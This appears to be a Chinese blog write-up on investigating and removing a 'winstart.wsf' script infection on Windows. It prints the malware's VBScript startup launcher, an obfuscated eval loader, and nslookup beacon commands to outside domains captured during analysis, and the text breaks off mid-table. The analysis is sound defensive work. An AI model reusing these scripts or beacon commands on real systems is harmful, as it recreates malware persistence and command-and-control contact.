当前位置: 首页 > news >正文

winstart.wsf 病毒清理大作战

0x00 背景

发现感染了winstart.wsf 病毒如何清理。

0x01 现象

遍历Users下每个目录以及C:\和C:\Windows\Temp 2个目录写入病毒文件。

C:\Users\Administrator\AppData\Local\Temp\winstart.wsf

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.wsf

C:\Users\userA\AppData\Local\Temp\winstart.wsf

C:\Users\userA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.wsf

C:\Users\Default\AppData\Local\Temp\winstart.wsf (我将Temp完整文件夹删除后不再创建,Temp\winstart.wsf Temp\Temp.Temp)

C:\autoexec.wsf

C:\Windows\Temp\winstart.wsf

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.wsf内容如下

<job> <objectid="w"progid="WScript.Shell"/>

<scriptlanguage="VBScript">

tempPath = w.expandenvironmentstrings("%TEMP%") & "\winstart.wsf" homeDrivePath = w.expandenvironmentstrings("%HOMEDRIVE%") & "\autoexec.wsf"

homePath = w.expandenvironmentstrings("%HOME%") & "\winstart.wsf"

w.run "wscript.exe //B " & Chr(34) & tempPath & Chr(34)

w.run "wscript.exe //B " & Chr(34) & homeDrivePath & Chr(34)

w.run "wscript.exe //B " & Chr(34) & homePath & Chr(34)

</script> </job>

%TEMP%\winstart.wsf内容如下

PNG<job id="EYPGTeN"><script language="VBScript" src="TMP.TMP">eval("ex"&"ecut"&"e(EYPGTeNeXe)=1")</Script></job>

%HOMEDRIVE%\autoexec.wsf

PNG<job id="EYPGTeN"><script language="VBScript" src="TMP.TMP">eval("ex"&"ecut"&"e(EYPGTeNeXe)=1")</Script></job>

%HOME%\winstart.wsf

PNG<job id="EYPGTeN"><script language="VBScript" src="TMP.TMP">eval("ex"&"ecut"&"e(EYPGTeNeXe)=1")</Script></job>

以上文件删除之后重新覆盖生成。

0x02 排查

通过wmi 定位子程序和父程序:

wmic process where "name='wscript.exe'" get processid,ParentProcessId,commandline

有2个程序

commandline

ParentProcessId

ParentProcessId

"C:\Windows\System32\wscript.exe" //B "C:\Windows\TEMP\winstart.wsf"

6208

5496

"C:\Windows\System32\wscript.exe" "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.wsf"

11372

14188

6208父进程无法在任务管理器看到 (可能是启动完父进程就结束了)

用processmon 抓包 Process Name: wscript.exe Operation: Process Create

有dns出网行为

Process Name

Operation

Path

Detail

wscript.exe

Process Create

C:\Windows\System32\cmd.exe

PID: 8984, Command line: "C:\Windows\System32\cmd.exe" /c nslookup a1.airobotheworld.com>>C:\Windows\TEMP\~cmdscript.tmp

wscript.exe

Process Create

C:\Windows\System32\cmd.exe

PID: 12140, Command line: "C:\Windows\System32\cmd.exe" /c nslookup a1.aigoingtokill.club>>C:\Windows\TEMP\~cmdscript.tmp

wscript.exe

Process Create

C:\Windows\System32\cmd.exe

PID: 11084, Command line: "C:\Windows\System32\cmd.exe" /c nslookup a1.6cs6.club>>C:\Windows\TEMP\~cmdscript.tmp

Process Name: scrcons.exe Operation: Process Create

Process Name

Operation

Path

Detail

scrcons.exe

Process Create

C:\Windows\System32\wscript.exe

PID: 912, Command line: "C:\Windows\System32\wscript.exe" //B "C:\Windows\TEMP\winstart.wsf"

进程链:

svchost.exe -> scrcons.exe -> wscript.exe

1).scrcons.exe 进程动作

(向很多目录写wsf文件,遍历Users下每个目录以及C:\和C:\Windows\Temp 2个目录):

C:\Users\Administrator\AppData\Local\Temp\winstart.wsf

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.wsf

C:\Users\userA\AppData\Local\Temp\winstart.wsf

C:\Users\userA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.wsf

C:\Users\Default\AppData\Local\Temp\winstart.wsf (我将Temp完整文件夹删除后不再创建,Temp\winstart.wsf Temp\Temp.Temp)

C:\autoexec.wsf

C:\Windows\Temp\TMP.TMP

C:\Windows\Temp\winstart.wsf

同时写注册表:winstart

winstart.wsf 内容:

PNG<job id="oesDllY"><script language="VBScript" src="TMP.TMP">eval("ex"&"ecut"&"e(oesDllYeXe)=1")</Script></job>

2).wscript.exe 进程动作:

PID: 8984, Command line: "C:\Windows\System32\cmd.exe" /c nslookup a1.airobotheworld.com>>C:\Windows\TEMP\~cmdscript.tmp

PID: 12140, Command line: "C:\Windows\System32\cmd.exe" /c nslookup a1.aigoingtokill.club>>C:\Windows\TEMP\~cmdscript.tmp

PID: 11084, Command line: "C:\Windows\System32\cmd.exe" /c nslookup a1.6cs6.club>>C:\Windows\TEMP\~cmdscript.tmp

2.1.检查开机启动项:

任务管理器-启动- 查看启动项

发现有开机启动项 wscript.exe

kill任务管理器中 wscript.exe

wmic process where "name='wscript.exe'" get processid,ParentProcessId,commandline

CommandLine ParentProcessId ProcessId

没有可用实例

删除注册表中

计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winstart键值 失败

猜测 scrcons.exe 被注入进程,执行 WriteFile (后重启无效,方向错误)

执行的动作是遍历Users下每个目录以及C:\和C:\Windows\Temp 2个目录:

AppData\Local 和 AppData\Roaming 主要区别:

特性

AppData\Local

AppData\Roaming

数据范围

本地计算机相关

用户

相关文章:

  • Vue动态添加或删除DOM元素:购物车实例
  • Spring Boot 三层架构【清晰易懂】
  • Python技术难点及详细解决方案
  • uv - Guides 指南 [官方文档翻译]
  • Rabbitmq消息被消费时抛异常,进入Unacked 状态,进而导致消费者不断尝试消费(下)
  • 图像对比分析并生成报告
  • GitHub开源的容器管理面板-Dpanel
  • 有时序协议与无时序协议区别(以RTU协议和TCP协议为例)RTU协议规定了严格时序要求:两个数据帧之间间隔时间必须在特定的范围内
  • (基本常识)C++中const与引用——面试常问
  • Linux 安装 Redis
  • C#中的Lambda表达式‌
  • VS2022的第一个Qt程序——实战《加载并显示图像》
  • 零门槛部署DeepSeek本地整合包一键即用
  • SpringBoot集成MybatisPlus
  • 编程实现自我指涉(self-reference)
  • 计算机网络--传输层(2)
  • <template>标签的作用,在构建可复用 UI 片段时如何应用?
  • Next.js 严重漏洞:攻击者可绕过中间件授权检查
  • Day28-代码随想录-平衡二叉树110+二叉树的所有路径257
  • 责任链模式-java
  • 一品威客旅游网站开发/免费推广引流平台推荐
  • 孟村县做网站/昆明自动seo
  • app网站及其特色/软文推广代理平台
  • 企业网站怎么做推广/品牌营销理论有哪些
  • 在线视频制作网站/站长之家点击进入
  • 孟村建设局网站/windows优化大师要会员